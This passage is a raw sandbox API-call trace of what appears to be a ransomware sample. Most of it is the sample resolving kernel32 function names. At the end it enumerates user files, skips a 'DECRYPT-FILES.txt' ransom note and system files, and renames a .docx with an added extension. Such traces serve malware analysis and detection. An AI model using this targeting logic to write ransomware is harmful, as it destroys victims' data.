(lpString="CREATEFILETRANSACTEDW") returned 21 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.173] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.173] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.173] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.173] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.173] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.173] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.174] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.174] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.174] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.174] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.174] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.174] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.174] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.174] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.174] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.174] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.174] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.174] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.174] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.174] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.174] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.174] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.174] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.174] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.174] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.174] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.175] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.175] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.175] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.175] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.175] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.175] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.175] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.175] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.175] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.175] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.175] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.175] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.175] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.175] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.175] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.175] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.175] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.175] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.175] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.176] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.176] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.176] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.176] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.176] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.176] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.176] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.176] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.176] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.176] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.176] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.176] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.176] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.176] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.176] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.176] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.176] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.176] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.176] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.176] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.177] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.177] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.177] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.177] lstrlenA (lpString="DELETEATOM") returned 10 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.177] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.177] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.177] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.177] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.177] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.177] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.177] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.177] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.177] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.177] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.177] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.177] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.177] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.177] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.177] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.178] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.178] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.178] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.178] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.178] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.178] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.178] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.178] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.178] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.178] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.178] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.178] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.178] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.178] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.178] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.178] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.178] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.178] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.178] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.178] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.179] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.179] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.179] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.179] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.179] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.179] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.179] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.179] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.179] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.179] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISBknX_Ny.docx") returned 60 [0077.179] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISBknX_Ny.docx.Gi2Q") returned 65 [0077.179] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISBknX_Ny.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\isbknx_ny.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISBknX_Ny.docx.Gi2Q" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\isbknx_ny.docx.gi2q"), dwFlags=0x0) returned 1 [0077.180] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.180] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.180] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.181] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7417a3b0, ftCreationTime.dwHighDateTime=0x1d4ce0d, ftLastAccessTime.dwLowDateTime=0x34c7e9b0, ftLastAccessTime.dwHighDateTime=0x1d4cce9, ftLastWriteTime.dwLowDateTime=0x34c7e9b0, ftLastWriteTime.dwHighDateTime=0x1d4cce9, nFileSizeHigh=0x0, nFileSizeLow=0x12240, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISyuUqVLVoKe2TYf1F.mkv", cAlternateFileName="ISYUUQ~1.MKV")) returned 1 [0077.181] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv", lpString2="DECRYPT-FILES.txt") returned 1 [0077.181] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv", lpString2="autorun.inf") returned 1 [0077.181] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv", lpString2="boot.ini") returned 1 [0077.181] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv", lpString2="desktop.ini") returned 1 [0077.181] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv", lpString2="ntuser.dat") returned -1 [0077.181] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv", lpString2="iconcache.db") returned 1 [0077.181] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv", lpString2="bootsect.bak") returned 1 [0077.181] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv", lpString2="ntuser.dat.log") returned -1 [0077.181] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv", lpString2="thumbs.db") returned -1 [0077.181] lstrcmpiW (lpString1="ISyuUqVLVoKe2TYf1F.mkv", lpString2="Bootfont.bin") returned 1 [0077.181] lstrlenW (lpString="ISyuUqVLVoKe2TYf1F.mkv") returned 22 [0077.181] lstrcmpiW (lpString1="mkv", lpString2="lnk") returned 1 [0077.181] lstrcmpiW (lpString1="mkv", lpString2="exe") returned 1 [0077.181] lstrcmpiW (lpString1="mkv", lpString2="sys") returned -1 [0077.181] lstrcmpiW (lpString1="mkv", lpString2="dll") returned 1 [0077.181] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0077.181] lstrlenW (lpString="ISyuUqVLVoKe2TYf1F.mkv") returned 22 [0077.181] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0077.181] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ISyuUqVLVoKe2TYf1F.mkv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ISyuUqVLVoKe2TYf1F.mkv") returned="C:\\Users\\5p5NrGJn0jS 